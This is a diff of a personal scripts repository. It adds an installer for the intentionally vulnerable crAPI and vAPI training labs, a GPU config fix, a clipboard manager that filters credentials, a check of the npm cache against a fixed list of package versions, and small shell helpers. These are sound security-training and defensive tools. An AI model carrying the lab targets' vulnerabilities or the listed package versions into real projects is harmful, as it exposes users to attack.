||||
echo "Install: sudo apt install docker.io docker-compose"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Setup lab directories
|
||||
setup_lab() {
|
||||
echo -e "${CYAN}[*]${NC} Setting up API testing lab..."
|
||||
|
||||
mkdir -p "$LAB_DIR"
|
||||
|
||||
# crAPI
|
||||
if [[ ! -d "$CRAPI_DIR" ]]; then
|
||||
echo -e "${YELLOW}[*]${NC} Setting up crAPI..."
|
||||
mkdir -p "$CRAPI_DIR"
|
||||
cd "$CRAPI_DIR"
|
||||
curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml
|
||||
sudo docker-compose pull
|
||||
echo -e "${GREEN}✓${NC} crAPI setup complete"
|
||||
else
|
||||
echo -e "${GREEN}✓${NC} crAPI already exists"
|
||||
fi
|
||||
|
||||
# vAPI
|
||||
if [[ ! -d "$VAPI_DIR" ]]; then
|
||||
echo -e "${YELLOW}[*]${NC} Setting up vAPI..."
|
||||
cd "$LAB_DIR"
|
||||
git clone https://github.com/roottusk/vapi.git
|
||||
cd "$VAPI_DIR"
|
||||
sudo docker-compose pull
|
||||
echo -e "${GREEN}✓${NC} vAPI setup complete"
|
||||
else
|
||||
echo -e "${GREEN}✓${NC} vAPI already exists"
|
||||
fi
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Lab setup complete!"
|
||||
echo -e "${CYAN}[*]${NC} Run: ${BOLD}api-lab start${NC} to launch"
|
||||
}
|
||||
|
||||
# Start containers
|
||||
start_lab() {
|
||||
local app="${1:-both}"
|
||||
|
||||
case "$app" in
|
||||
crapi)
|
||||
if [[ ! -d "$CRAPI_DIR" ]]; then
|
||||
echo -e "${RED}Error:${NC} crAPI not set up. Run: api-lab setup"
|
||||
exit 1
|
||||
fi
|
||||
echo -e "${CYAN}[*]${NC} Starting crAPI..."
|
||||
cd "$CRAPI_DIR"
|
||||
sudo docker-compose -f docker-compose.yml --compatibility up -d
|
||||
echo -e "${GREEN}✓${NC} crAPI started"
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://127.0.0.1:8888${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Mailhog at: ${BOLD}http://127.0.0.1:8025${NC}"
|
||||
;;
|
||||
|
||||
vapi)
|
||||
if [[ ! -d "$VAPI_DIR" ]]; then
|
||||
echo -e "${RED}Error:${NC} vAPI not set up. Run: api-lab setup"
|
||||
exit 1
|
||||
fi
|
||||
echo -e "${CYAN}[*]${NC} Starting vAPI..."
|
||||
cd "$VAPI_DIR"
|
||||
sudo docker-compose up -d
|
||||
echo -e "${GREEN}✓${NC} vAPI started"
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://127.0.0.1/vapi${NC}"
|
||||
;;
|
||||
|
||||
both|all)
|
||||
start_lab crapi
|
||||
echo
|
||||
start_lab vapi
|
||||
;;
|
||||
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown app: $app"
|
||||
echo "Valid options: crapi, vapi, both"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Stop containers
|
||||
stop_lab() {
|
||||
local app="${1:-both}"
|
||||
|
||||
case "$app" in
|
||||
crapi)
|
||||
if [[ -d "$CRAPI_DIR" ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Stopping crAPI..."
|
||||
cd "$CRAPI_DIR"
|
||||
sudo docker-compose stop
|
||||
echo -e "${GREEN}✓${NC} crAPI stopped"
|
||||
fi
|
||||
;;
|
||||
|
||||
vapi)
|
||||
if [[ -d "$VAPI_DIR" ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Stopping vAPI..."
|
||||
cd "$VAPI_DIR"
|
||||
sudo docker-compose stop
|
||||
echo -e "${GREEN}✓${NC} vAPI stopped"
|
||||
fi
|
||||
;;
|
||||
|
||||
both|all)
|
||||
stop_lab crapi
|
||||
stop_lab vapi
|
||||
;;
|
||||
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown app: $app"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Show status
|
||||
show_status() {
|
||||
echo -e "${BOLD}${CYAN}API Lab Status:${NC}"
|
||||
echo
|
||||
sudo docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|crapi|vapi)" || echo "No lab containers running"
|
||||
}
|
||||
|
||||
# Show logs
|
||||
show_logs() {
|
||||
local app="${1:-}"
|
||||
|
||||
if [[ -z "$app" ]]; then
|
||||
echo -e "${RED}Error:${NC} Specify app: crapi or vapi"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
case "$app" in
|
||||
crapi)
|
||||
cd "$CRAPI_DIR"
|
||||
sudo docker-compose logs -f
|
||||
;;
|
||||
vapi)
|
||||
cd "$VAPI_DIR"
|
||||
sudo docker-compose logs -f
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown app: $app"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Main
|
||||
check_docker
|
||||
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
command="$1"
|
||||
shift
|
||||
|
||||
case "$command" in
|
||||
setup|install)
|
||||
setup_lab
|
||||
;;
|
||||
start|up)
|
||||
start_lab "${1:-both}"
|
||||
;;
|
||||
stop|down)
|
||||
stop_lab "${1:-both}"
|
||||
;;
|
||||
status|ps)
|
||||
show_status
|
||||
;;
|
||||
logs)
|
||||
show_logs "${1:-}"
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown command: $command"
|
||||
echo "Run 'api-lab --help' for usage"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
22
scripts/apply-gpu-fix.sh
Executable file
22
scripts/apply-gpu-fix.sh
Executable file
|
|
@ -0,0 +1,22 @@
|
|||
#!/bin/bash
|
||||
# Apply AMD GPU power management fix for Pop!_OS 22.04
|
||||
|
||||
echo "Creating AMD GPU configuration..."
|
||||
sudo bash -c 'cat > /etc/modprobe.d/amdgpu.conf << EOFINNER
|
||||
# Disable aggressive power management for AMD Phoenix GPU
|
||||
# Temporary fix until Pop!_OS 24.04 stable (Dec 11, 2025)
|
||||
options amdgpu ppfeaturemask=0x0
|
||||
options amdgpu dpm=0
|
||||
EOFINNER'
|
||||
|
||||
echo ""
|
||||
echo "Verifying configuration was created..."
|
||||
cat /etc/modprobe.d/amdgpu.conf
|
||||
|
||||
echo ""
|
||||
echo "Rebuilding initramfs..."
|
||||
sudo update-initramfs -u
|
||||
|
||||
echo ""
|
||||
echo "✅ Fix applied! Please reboot now:"
|
||||
echo " sudo reboot"
|
||||
37
scripts/catbin
Executable file
37
scripts/catbin
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: catbin
|
||||
# Description: Display source code of executables in PATH (security auditing!)
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
# Usage: catbin httpstatus # see what the httpstatus script does
|
||||
# catbin tryna # audit the tryna script
|
||||
# catbin ls # won't work for binaries, only scripts
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: catbin <command-name>" >&2
|
||||
echo "Example: catbin httpstatus" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
cmd_path=$(command -v "$1" 2>/dev/null || true)
|
||||
|
||||
if [[ -z "$cmd_path" ]]; then
|
||||
echo "Command not found: $1" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check if it's a text file (script) or binary
|
||||
if file "$cmd_path" | grep -q "text"; then
|
||||
# Use bat if available for syntax highlighting
|
||||
if command -v bat &>/dev/null; then
|
||||
bat "$cmd_path"
|
||||
else
|
||||
cat "$cmd_path"
|
||||
fi
|
||||
else
|
||||
echo "Error: $cmd_path is a binary, not a script" >&2
|
||||
echo "File type: $(file "$cmd_path")" >&2
|
||||
exit 1
|
||||
fi
|
||||
56
scripts/check-npm-cache.sh
Executable file
56
scripts/check-npm-cache.sh
Executable file
|
|
@ -0,0 +1,56 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
packages_json='[
|
||||
{"name":"backslash","version":"0.2.1"},
|
||||
{"name":"chalk-template","version":"1.1.1"},
|
||||
{"name":"supports-hyperlinks","version":"4.1.1"},
|
||||
{"name":"has-ansi","version":"6.0.1"},
|
||||
{"name":"simple-swizzle","version":"0.2.3"},
|
||||
{"name":"color-string","version":"2.1.1"},
|
||||
{"name":"error-ex","version":"1.3.3"},
|
||||
{"name":"color-name","version":"2.0.1"},
|
||||
{"name":"is-arrayish","version":"0.3.3"},
|
||||
{"name":"slice-ansi","version":"7.1.1"},
|
||||
{"name":"color-convert","version":"3.1.1"},
|
||||
{"name":"wrap-ansi","version":"9.0.1"},
|
||||
{"name":"ansi-regex","version":"6.2.1"},
|
||||
{"name":"supports-color","version":"10.2.1"},
|
||||
{"name":"strip-ansi","version":"7.1.1"},
|
||||
{"name":"chalk","version":"5.6.1"},
|
||||
{"name":"debug","version":"4.4.2"},
|
||||
{"name":"ansi-styles","version":"6.2.2"},
|
||||
{"name":"proto-tinker-wc","version":"0.1.87"},
|
||||
{"name":"duckdb","version":"1.3.3"},
|
||||
{"name":"@duckdb/node-api","version":"1.3.3"},
|
||||
{"name":"@duckdb/node-bindings","version":"1.3.3"}
|
||||
]'
|
||||
|
||||
if ! command -v jq >/dev/null 2>&1; then
|
||||
echo "Error: 'jq' is required (to parse the JSON array-of-objects)."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
names=$(printf '%s\n' "$packages_json" | jq -r '.[].name' | tr '\n' ' ')
|
||||
|
||||
echo "Running 'npm cache ls' for given packages..."
|
||||
npm_output="$(npm cache ls $names 2>/dev/null || true)"
|
||||
|
||||
echo
|
||||
echo "Packages found in npm cache:"
|
||||
tmpfile=$(mktemp)
|
||||
trap 'rm -f "$tmpfile"' EXIT
|
||||
|
||||
# loop through package/version
|
||||
printf '%s\n' "$packages_json" | jq -r '.[] | "\(.name)\t\(.version)"' | \
|
||||
while IFS=$'\t' read -r name version; do
|
||||
if [ -n "$name" ] && printf '%s\n' "$npm_output" | grep -q "${name}-${version}"; then
|
||||
echo "• $name@$version"
|
||||
echo 1 >> "$tmpfile"
|
||||
fi
|
||||
done
|
||||
|
||||
if ! grep -q 1 "$tmpfile"; then
|
||||
echo "(none)"
|
||||
fi
|
||||
|
||||
18
scripts/cht.sh
Executable file
18
scripts/cht.sh
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Primagean cht.sh
|
||||
# tmux + cht.sh + fzf
|
||||
|
||||
languages=`echo "golang lua cpp c typescript nodejs" | tr ' ' '\n'`
|
||||
core_utils=`echo "xargs find mv sed awk" | tr ' ' '\n'`
|
||||
|
||||
selected=`printf "$languages\n$core_utils" | fzf`
|
||||
read -p "query: " query
|
||||
|
||||
if printf $languages | grep -qs $selected; then
|
||||
tmux neww bash -c "curl cht.sh/$selected/`echo $query | tr ' ' '+'` & while [ : ]; do sleep 1; done"
|
||||
else
|
||||
tmux neww bash -c "curl cht.sh/$selected~$query & while [ : ]; do sleep 1; done"
|
||||
fi
|
||||
|
||||
|
||||
528
scripts/clip
Executable file
528
scripts/clip
Executable file
|
|
@ -0,0 +1,528 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: clip
|
||||
# Description: Smart clipboard manager with history, search, and categories
|
||||
# Usage: clip # Show history with fzf search
|
||||
# clip pin # Pin current clipboard item
|
||||
# clip cat 5 # Show 5th history item
|
||||
# clip search "192" # Search history
|
||||
# clip clear # Clear history
|
||||
|
||||
VERSION="1.0.0"
|
||||
CLIP_DIR="$HOME/.clipboard"
|
||||
HISTORY_FILE="$CLIP_DIR/history.txt"
|
||||
PINS_FILE="$CLIP_DIR/pins.txt"
|
||||
MAX_HISTORY=100
|
||||
|
||||
# Colors
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly RED='\033[0;31m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Initialize clip directory
|
||||
init_clip() {
|
||||
if [[ ! -d "$CLIP_DIR" ]]; then
|
||||
mkdir -p "$CLIP_DIR"
|
||||
touch "$HISTORY_FILE"
|
||||
touch "$PINS_FILE"
|
||||
fi
|
||||
}
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}clip${NC} - Smart Clipboard Manager v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " clip [COMMAND]"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}(no args)${NC} Show history with fzf search"
|
||||
echo -e " ${CYAN}pin${NC} Pin current clipboard item"
|
||||
echo -e " ${CYAN}pins${NC} Show pinned items"
|
||||
echo -e " ${CYAN}cat N${NC} Show Nth history item"
|
||||
echo -e " ${CYAN}search TERM${NC} Search history"
|
||||
echo -e " ${CYAN}list${NC} List recent history (last 20)"
|
||||
echo -e " ${CYAN}save${NC} Save current clipboard to history"
|
||||
echo -e " ${CYAN}clear${NC} Clear history"
|
||||
echo -e " ${CYAN}delete N${NC} Delete Nth history item"
|
||||
echo -e " ${CYAN}unpin N${NC} Delete Nth pinned item"
|
||||
echo -e " ${CYAN}stats${NC} Show statistics"
|
||||
echo -e " ${CYAN}-h, --help${NC} Show this help"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " clip # Interactive search"
|
||||
echo " clip pin # Pin important item"
|
||||
echo " clip search \"192.168\" # Find IP addresses"
|
||||
echo " clip cat 1 # Show most recent"
|
||||
echo " clip delete 5 # Delete 5th item from history"
|
||||
echo " clip unpin 1 # Delete 1st pinned item"
|
||||
echo
|
||||
echo -e "${BOLD}FEATURES:${NC}"
|
||||
echo " - Automatic history (monitors clipboard)"
|
||||
echo " - Pattern detection (URLs, IPs, hashes)"
|
||||
echo " - Security: Auto-expire sensitive data"
|
||||
echo " - Pin important items"
|
||||
echo " - fzf integration for search"
|
||||
echo
|
||||
echo -e "${BOLD}NOTES:${NC}"
|
||||
echo " History: $HISTORY_FILE"
|
||||
echo " Pins: $PINS_FILE"
|
||||
echo " Max history: $MAX_HISTORY items"
|
||||
}
|
||||
|
||||
# Detect content type
|
||||
detect_type() {
|
||||
local content="$1"
|
||||
|
||||
# URL
|
||||
if [[ "$content" =~ ^https?:// ]]; then
|
||||
echo "url"
|
||||
# IPv4
|
||||
elif [[ "$content" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} ]]; then
|
||||
echo "ip"
|
||||
# Hash (32 or 40 or 64 hex chars)
|
||||
elif [[ "$content" =~ ^[a-f0-9]{32}$ ]] || [[ "$content" =~ ^[a-f0-9]{40}$ ]] || [[ "$content" =~ ^[a-f0-9]{64}$ ]]; then
|
||||
echo "hash"
|
||||
# Code (contains common code markers)
|
||||
elif [[ "$content" =~ (function|const|var|class|def|import|export) ]]; then
|
||||
echo "code"
|
||||
# Credential patterns (don't save these!)
|
||||
elif [[ "$content" =~ (password|secret|token|key|bearer|api[_-]?key) ]]; then
|
||||
echo "credential"
|
||||
else
|
||||
echo "text"
|
||||
fi
|
||||
}
|
||||
|
||||
# Save item to history
|
||||
save_to_history() {
|
||||
local content="$1"
|
||||
local type=$(detect_type "$content")
|
||||
|
||||
# Don't save credentials
|
||||
if [[ "$type" == "credential" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Sensitive data detected - not saved to history" >&2
|
||||
return 0
|
||||
fi
|
||||
|
||||
# Don't save empty
|
||||
if [[ -z "$content" ]]; then
|
||||
return 0
|
||||
fi
|
||||
|
||||
# Don't save if it's already the most recent
|
||||
if [[ -f "$HISTORY_FILE" ]]; then
|
||||
last_entry=$(tail -1 "$HISTORY_FILE" | cut -d'|' -f3-)
|
||||
if [[ "$last_entry" == "$content" ]]; then
|
||||
return 0
|
||||
fi
|
||||
fi
|
||||
|
||||
# Save: timestamp|type|content
|
||||
timestamp=$(date '+%Y-%m-%d %H:%M:%S')
|
||||
echo "$timestamp|$type|$content" >> "$HISTORY_FILE"
|
||||
|
||||
# Trim history to max size
|
||||
if [[ $(wc -l < "$HISTORY_FILE") -gt $MAX_HISTORY ]]; then
|
||||
tail -n $MAX_HISTORY "$HISTORY_FILE" > "$HISTORY_FILE.tmp"
|
||||
mv "$HISTORY_FILE.tmp" "$HISTORY_FILE"
|
||||
fi
|
||||
}
|
||||
|
||||
# Get current clipboard
|
||||
get_clipboard() {
|
||||
if command -v xsel &>/dev/null; then
|
||||
xsel --output --clipboard
|
||||
elif command -v xclip &>/dev/null; then
|
||||
xclip -selection clipboard -o
|
||||
else
|
||||
echo "Error: No clipboard tool found" >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Set clipboard
|
||||
set_clipboard() {
|
||||
if command -v xsel &>/dev/null; then
|
||||
echo -n "$1" | xsel --input --clipboard
|
||||
elif command -v xclip &>/dev/null; then
|
||||
echo -n "$1" | xclip -selection clipboard
|
||||
else
|
||||
echo "Error: No clipboard tool found" >&2
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Interactive history browser with fzf
|
||||
show_history_fzf() {
|
||||
if ! command -v fzf &>/dev/null; then
|
||||
echo -e "${RED}Error:${NC} fzf not found" >&2
|
||||
echo "Install it with: sudo apt install fzf" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ! -f "$HISTORY_FILE" ]] || [[ ! -s "$HISTORY_FILE" ]]; then
|
||||
echo -e "${YELLOW}No history yet${NC}" >&2
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# Format for fzf: index | time | type | preview
|
||||
selected=$(tac "$HISTORY_FILE" | awk -F'|' '
|
||||
{
|
||||
idx = NR
|
||||
time = $1
|
||||
type = $2
|
||||
content = $3
|
||||
for (i=4; i<=NF; i++) content = content "|" $i
|
||||
|
||||
# Truncate preview
|
||||
preview = content
|
||||
if (length(preview) > 60) {
|
||||
preview = substr(preview, 1, 60) "..."
|
||||
}
|
||||
|
||||
printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
|
||||
}
|
||||
' | fzf --height=60% --layout=reverse \
|
||||
--header="Select item to copy (ESC to cancel)" \
|
||||
--preview='echo {}' \
|
||||
--preview-window=up:3:wrap)
|
||||
|
||||
if [[ -n "$selected" ]]; then
|
||||
# Extract the full content
|
||||
index=$(echo "$selected" | awk '{print $1}')
|
||||
full_content=$(tac "$HISTORY_FILE" | sed -n "${index}p" | cut -d'|' -f3-)
|
||||
|
||||
# Copy to clipboard
|
||||
set_clipboard "$full_content"
|
||||
echo -e "${GREEN}✓${NC} Copied to clipboard"
|
||||
fi
|
||||
}
|
||||
|
||||
# Pin current clipboard
|
||||
pin_item() {
|
||||
local content=$(get_clipboard)
|
||||
|
||||
if [[ -z "$content" ]]; then
|
||||
echo -e "${RED}Error:${NC} Clipboard is empty" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
type=$(detect_type "$content")
|
||||
timestamp=$(date '+%Y-%m-%d %H:%M:%S')
|
||||
|
||||
echo "$timestamp|$type|$content" >> "$PINS_FILE"
|
||||
echo -e "${GREEN}✓${NC} Pinned item (type: $type)"
|
||||
}
|
||||
|
||||
# Show pins
|
||||
show_pins() {
|
||||
if [[ ! -f "$PINS_FILE" ]] || [[ ! -s "$PINS_FILE" ]]; then
|
||||
echo -e "${YELLOW}No pinned items${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}Pinned Items:${NC}"
|
||||
echo
|
||||
|
||||
if command -v fzf &>/dev/null; then
|
||||
# Interactive selection
|
||||
selected=$(cat "$PINS_FILE" | awk -F'|' '
|
||||
{
|
||||
idx = NR
|
||||
time = $1
|
||||
type = $2
|
||||
content = $3
|
||||
for (i=4; i<=NF; i++) content = content "|" $i
|
||||
|
||||
preview = content
|
||||
if (length(preview) > 60) {
|
||||
preview = substr(preview, 1, 60) "..."
|
||||
}
|
||||
|
||||
printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
|
||||
}
|
||||
' | fzf --height=60% --layout=reverse \
|
||||
--header="Select pinned item to copy (ESC to cancel)" \
|
||||
--preview='echo {}')
|
||||
|
||||
if [[ -n "$selected" ]]; then
|
||||
index=$(echo "$selected" | awk '{print $1}')
|
||||
full_content=$(sed -n "${index}p" "$PINS_FILE" | cut -d'|' -f3-)
|
||||
set_clipboard "$full_content"
|
||||
echo -e "${GREEN}✓${NC} Copied pinned item to clipboard"
|
||||
fi
|
||||
else
|
||||
# Just list them
|
||||
cat "$PINS_FILE" | awk -F'|' '
|
||||
{
|
||||
idx = NR
|
||||
time = $1
|
||||
type = $2
|
||||
content = $3
|
||||
for (i=4; i<=NF; i++) content = content "|" $i
|
||||
|
||||
preview = content
|
||||
if (length(preview) > 60) {
|
||||
preview = substr(preview, 1, 60) "..."
|
||||
}
|
||||
|
||||
printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
|
||||
}
|
||||
'
|
||||
fi
|
||||
}
|
||||
|
||||
# Show specific item
|
||||
show_item() {
|
||||
local index=$1
|
||||
|
||||
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||
echo -e "${RED}Error:${NC} No history" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
content=$(tac "$HISTORY_FILE" | sed -n "${index}p" | cut -d'|' -f3-)
|
||||
|
||||
if [[ -z "$content" ]]; then
|
||||
echo -e "${RED}Error:${NC} No item at index $index" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "$content"
|
||||
}
|
||||
|
||||
# Search history
|
||||
search_history() {
|
||||
local query="$1"
|
||||
|
||||
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||
echo -e "${RED}Error:${NC} No history" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}Search results for: ${query}${NC}"
|
||||
echo
|
||||
|
||||
grep -i "$query" "$HISTORY_FILE" | awk -F'|' '
|
||||
{
|
||||
time = $1
|
||||
type = $2
|
||||
content = $3
|
||||
for (i=4; i<=NF; i++) content = content "|" $i
|
||||
|
||||
preview = content
|
||||
if (length(preview) > 60) {
|
||||
preview = substr(preview, 1, 60) "..."
|
||||
}
|
||||
|
||||
printf "%s | %-10s | %s\n", time, "[" type "]", preview
|
||||
}
|
||||
'
|
||||
}
|
||||
|
||||
# List recent items
|
||||
list_recent() {
|
||||
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||
echo -e "${YELLOW}No history${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}Recent Clipboard History (last 20):${NC}"
|
||||
echo
|
||||
|
||||
tail -20 "$HISTORY_FILE" | tac | awk -F'|' '
|
||||
{
|
||||
idx = NR
|
||||
time = $1
|
||||
type = $2
|
||||
content = $3
|
||||
for (i=4; i<=NF; i++) content = content "|" $i
|
||||
|
||||
preview = content
|
||||
if (length(preview) > 60) {
|
||||
preview = substr(preview, 1, 60) "..."
|
||||
}
|
||||
|
||||
printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
|
||||
}
|
||||
'
|
||||
}
|
||||
|
||||
# Statistics
|
||||
show_stats() {
|
||||
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||
echo -e "${YELLOW}No history${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
total=$(wc -l < "$HISTORY_FILE")
|
||||
pins=$(wc -l < "$PINS_FILE" 2>/dev/null || echo 0)
|
||||
|
||||
echo -e "${BOLD}${CYAN}Clipboard Statistics:${NC}"
|
||||
echo
|
||||
echo " Total items: $total"
|
||||
echo " Pinned items: $pins"
|
||||
echo " Max history: $MAX_HISTORY"
|
||||
echo
|
||||
|
||||
echo -e "${BOLD}${CYAN}By Type:${NC}"
|
||||
awk -F'|' '{print $2}' "$HISTORY_FILE" | sort | uniq -c | sort -rn | awk '
|
||||
{printf " %-15s %d\n", $2, $1}'
|
||||
}
|
||||
|
||||
# Delete specific item from history
|
||||
delete_item() {
|
||||
local index=$1
|
||||
|
||||
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||
echo -e "${RED}Error:${NC} No history" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
total=$(wc -l < "$HISTORY_FILE")
|
||||
if [[ $index -lt 1 ]] || [[ $index -gt $total ]]; then
|
||||
echo -e "${RED}Error:${NC} Invalid index (1-$total)" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Show what we're deleting
|
||||
content=$(tac "$HISTORY_FILE" | sed -n "${index}p" | cut -d'|' -f3-)
|
||||
preview="${content:0:60}"
|
||||
if [[ ${#content} -gt 60 ]]; then
|
||||
preview="${preview}..."
|
||||
fi
|
||||
|
||||
echo -e "${YELLOW}Delete item $index:${NC} $preview"
|
||||
echo -n "Continue? (y/N) "
|
||||
read -r response
|
||||
|
||||
if [[ "$response" =~ ^[Yy]$ ]]; then
|
||||
# Delete line (remember tac reverses order)
|
||||
actual_line=$((total - index + 1))
|
||||
sed -i "${actual_line}d" "$HISTORY_FILE"
|
||||
echo -e "${GREEN}✓${NC} Deleted item $index"
|
||||
else
|
||||
echo "Cancelled"
|
||||
fi
|
||||
}
|
||||
|
||||
# Delete pinned item
|
||||
delete_pin() {
|
||||
local index=$1
|
||||
|
||||
if [[ ! -f "$PINS_FILE" ]] || [[ ! -s "$PINS_FILE" ]]; then
|
||||
echo -e "${YELLOW}No pinned items${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
total=$(wc -l < "$PINS_FILE")
|
||||
if [[ $index -lt 1 ]] || [[ $index -gt $total ]]; then
|
||||
echo -e "${RED}Error:${NC} Invalid index (1-$total)" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Show what we're deleting
|
||||
content=$(sed -n "${index}p" "$PINS_FILE" | cut -d'|' -f3-)
|
||||
preview="${content:0:60}"
|
||||
if [[ ${#content} -gt 60 ]]; then
|
||||
preview="${preview}..."
|
||||
fi
|
||||
|
||||
echo -e "${YELLOW}Unpin item $index:${NC} $preview"
|
||||
echo -n "Continue? (y/N) "
|
||||
read -r response
|
||||
|
||||
if [[ "$response" =~ ^[Yy]$ ]]; then
|
||||
sed -i "${index}d" "$PINS_FILE"
|
||||
echo -e "${GREEN}✓${NC} Unpinned item $index"
|
||||
else
|
||||
echo "Cancelled"
|
||||
fi
|
||||
}
|
||||
|
||||
# Clear history
|
||||
clear_history() {
|
||||
echo -n "Clear clipboard history? (y/N) "
|
||||
read -r response
|
||||
if [[ "$response" =~ ^[Yy]$ ]]; then
|
||||
> "$HISTORY_FILE"
|
||||
echo -e "${GREEN}✓${NC} History cleared"
|
||||
else
|
||||
echo "Cancelled"
|
||||
fi
|
||||
}
|
||||
|
||||
# Initialize
|
||||
init_clip
|
||||
|
||||
# Parse command
|
||||
if [[ $# -eq 0 ]]; then
|
||||
show_history_fzf
|
||||
exit 0
|
||||
fi
|
||||
|
||||
case $1 in
|
||||
-h|--help|help)
|
||||
show_help
|
||||
;;
|
||||
save)
|
||||
content=$(get_clipboard)
|
||||
save_to_history "$content"
|
||||
echo -e "${GREEN}✓${NC} Saved to history"
|
||||
;;
|
||||
pin)
|
||||
pin_item
|
||||
;;
|
||||
pins)
|
||||
show_pins
|
||||
;;
|
||||
cat)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Item index required" >&2
|
||||
exit 1
|
||||
fi
|
||||
show_item "$2"
|
||||
;;
|
||||
search|s)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Search query required" >&2
|
||||
exit 1
|
||||
fi
|
||||
shift
|
||||
search_history "$*"
|
||||
;;
|
||||
list|ls|l)
|
||||
list_recent
|
||||
;;
|
||||
delete|del|rm)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Item index required" >&2
|
||||
exit 1
|
||||
fi
|
||||
delete_item "$2"
|
||||
;;
|
||||
unpin)
|
||||
if [[ $# -lt 2 ]]; then
|
||||
echo -e "${RED}Error:${NC} Item index required" >&2
|
||||
exit 1
|
||||
fi
|
||||
delete_pin "$2"
|
||||
;;
|
||||
clear)
|
||||
clear_history
|
||||
;;
|
||||
stats)
|
||||
show_stats
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown command: $1" >&2
|
||||
echo "Run 'clip --help' for usage" >&2
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
34
scripts/common_ports.py
Normal file
34
scripts/common_ports.py
Normal file
|
|
@ -0,0 +1,34 @@
|
|||
ports_and_services = {
|
||||
20: "ftp-data",
|
||||
21: "ftp",
|
||||
22: "ssh",
|
||||
23: "telnet",
|
||||
25: "smtp",
|
||||
53: "dns",
|
||||
67: "dhcp",
|
||||
68: "dhcp",
|
||||
69: "tftp",
|
||||
80: "http",
|
||||
110: "pop3",
|
||||
123: "ntp",
|
||||
137: "netbios-ns",
|
||||
138: "netbios-dgm",
|
||||
139: "netbios-ssn",
|
||||
143: "imap",
